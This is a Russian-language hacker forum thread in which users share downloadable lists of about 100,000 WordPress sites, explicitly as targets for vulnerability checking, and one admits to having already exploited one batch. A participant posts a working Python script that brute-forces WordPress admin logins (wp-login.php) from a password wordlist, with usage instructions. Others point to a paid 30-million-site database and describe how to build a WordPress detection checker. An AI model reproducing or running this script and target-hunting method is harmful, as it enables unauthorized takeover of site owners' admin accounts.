Список сайтов WP 100к

Bastar

hunter
Забанен
Регистрация
06.03.2021
Сообщения
747
Решения
1
Реакции
561
Гарант сделки
7
Депозит
0.0022
Пожалуйста, обратите внимание, что пользователь заблокирован
Список разбит на файлы построчно, по 10к в файле.
Если увижу интерес к сливу, буду публиковать еще.
 

Вложения

  • WP10k_2.txt
    172.9 КБ · Просмотры: 88
  • WP10k_3.txt
    162.1 КБ · Просмотры: 44
  • WP10k_4.txt
    162.1 КБ · Просмотры: 44
  • WP10k_5.txt
    158.7 КБ · Просмотры: 44
  • WP10k_6.txt
    157.9 КБ · Просмотры: 40
  • WP10k_7.txt
    147.5 КБ · Просмотры: 47
  • WP10k_8.txt
    166.6 КБ · Просмотры: 46
  • WP10k_9.txt
    168.4 КБ · Просмотры: 45
  • WP10k_10.txt
    159.7 КБ · Просмотры: 50
Пожалуйста, обратите внимание, что пользователь заблокирован
А что это? Список сайтов на WordPress?
Да, просто обширный список сайтов на WP. Пойдет для чека на уязвимости, например.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Почему кстати нет файла с цифрой 1? :)
Какой ты внимательный. Просто я уже чекнул его и нет желания выкладывать отработку)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Могу скинуть скрипт для быстрого брутфорса wp админок, для проверки на дефолтные или легкие пароли
Да, можно прям тут его и оставить и если не затруднит, кратко опишите как работать.
У меня найдется еще несколько сотен тысяч линков, так что периодически буду делиться с новичками для обучения.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Как то видел прогу что ломает ВП админки через уязвимости - так там с списке у него 26 млн ВП сайтов.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Как то видел прогу что ломает ВП админки через уязвимости - так там с списке у него 26 млн ВП сайтов.
Что за софтина, если не секрет?
 
Python:
import os

class Brute:
    def __init__(self, password, user, url, banner):
        self.url = url
        self.banner = banner
        self.user = user
        self.password = password
        self.session = Session()
        self._post = {'log': self.user,
                     'pwd': ''
                     }
        self.requests()

    def requests(self):
        print('________________Start Bruteforce________________')
        for i in open(self.password, 'r'):
            self.propusk = n = ''.join([' ' for s in range(int(30-(len(i.strip('\n'))+10)))])
            self.passw = i.strip('\n')
            self._post['pwd'] = self.passw
            self.r = self.session.post(self.url, self._post)
            if 'login_error' in self.r.text:
                print(colorama.Fore.RED + 'pass=> ' + colorama.Fore.RESET + f'{self.passw}{self.propusk}incorrect')
            else:
                print(colorama.Fore.RED + 'pass=> ' + colorama.Fore.RESET + f'{self.passw}{self.propusk}CORRECT')
                exit()


if __name__ == '__main__':
    banner ='''                                               ____                            _______
                  _    _    _  _____          | /\ \  _____  ___ ___ _________ | ____|
                 \ \  | |  / / | /\ \   ___   | \/ /  | /\ \ | | | | |__   __| | |___
                  \ \_| |_/ /  |_\/_/  |___|  | /\ \  | \/_/ | |_| |    | |    | |___
                   \_______/   |_|            |_\/_/  |_|\_\ |_____|    |_|    |_____| 
            '''
    os.system('cls' if os.name == 'nt' else 'clear')
    print("________________Checking modules________________")
    try:
        from requests import Session
        import colorama
        colorama.init(autoreset=True)
        print('________________Checking complete_______________')
    except ImportError:
        print('________________Downloading modules________________')
        os.system('pip install requests colorama')
        from requests import Session
        import colorama
        print('________________Download complete________________')
    os.system('cls' if os.name == 'nt' else 'clear')
    print(colorama.Fore.RED + f'{banner}' + colorama.Fore.RESET)
    url = input('\n\nURL => ')
    user = input('Username => ')
    password = input('Passwords(*.txt) => ')
    os.system('cls' if os.name == 'nt' else 'clear')
    print(colorama.Fore.GREEN + 'url: ' + url)
    print(colorama.Fore.GREEN + f'username: {user}')
    print(colorama.Fore.GREEN + f'passwords: {password}\n' + colorama.Fore.RESET)
    if 'wp-login.php' not in url:
            print('Invalid URL')
            exit()
    Brute(password, user, url, banner)
 
В url вставлять ссылку на wp-login.php с http или https, иначе скрипт работать не будет. В пароли указывать .txt файл. Если словарь с в той же директории, то можно просто название указать файла. А если словарь не в директории со скриптом, то нужно полный путь указывать. Работает пока только на одного пользователя, без прокси. Скрипт написан мной, если что-то нужно будет доработать пишите в лс, сделаю, что нужно.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Что за софтина, если не секрет?
Уже 30 млн база ВП сайтов

https://*********/product/nJCOVWP
 
Список разбит на файлы построчно, по 10к в файле.
Если увижу интерес к сливу, буду публиковать еще.
Бро подскажи чем чекаеш сайты на впн ? Появилась потребность N количество сайтов собрать и проверить на вп они или нет
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Бро подскажи чем чекаеш сайты на впн ? Появилась потребность N количество сайтов собрать и проверить на вп они или нет
На память уже не скажу как проще, вот первое что пришло на ум - находим постоянный линк у wp, к примеру namesites.com/wp-admin и пишем простенький чекер который проверяет есть ли такая страничка, а заодно можно допилить более тонкий чек, смотря что ты делаешь там.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх